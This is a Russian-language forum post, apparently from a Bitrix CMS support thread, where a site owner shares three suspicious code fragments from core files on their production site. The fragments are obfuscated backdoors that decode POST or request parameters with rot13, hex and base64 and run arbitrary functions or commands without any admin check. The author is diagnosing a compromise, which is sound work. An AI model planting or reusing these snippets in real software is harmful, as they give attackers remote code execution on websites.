[QUOTE] написал:
Так а если тут просто скачать дистрибутив для php[/QUOTE]
Проблема у демки, на сколько я в вижу.
[LIST=1]
[*]Часть файлов зашифрована, т.е. сравнить с ними я не смогу
[*]Версия не совпадает, у меня на сайте 18.5.180
[/LIST][QUOTE] написал:
Это все, конечно, очень подозрительно[/QUOTE]
На случай, если это был сарказм, прикладываю пояснения :)
/bitrix/modules/main/bx_root.php - Считаю подозрительным на основании следующего файла "prolog_after.php", так как перекликается код
[CODE]if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
[/CODE]/bitrix/modules/main/include/prolog_after.php - Выглядит как возможность исполнять любой код, отправляя POST-запрос с параметром BX_STAT. При этом никаких проверок из серии "только если админ" я не вижу.[CODE]define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){
$APPLICATION->RestartBuffer();
CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
die();
[/CODE]/bitrix/tools/spread.php - Выглядит как возможность вызвать любую ф-ию, направив запрос с параметром "state". При этом никаких проверок из серии "только если админ" я не вижу.[CODE]if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"]))
{
$arState = array();
parse_str(base64_decode($_REQUEST["state"]), $arState);
echo $arState[0]($arState[1],$arState[2]);
die();
}
[/CODE]-[QUOTE] написал:
Может быть Вам эта статья поможет для переустановки модулей[/QUOTE]
Спасибо, хотя так как это большой сайт на проде, не хотелось бы прямо на нем заменять модули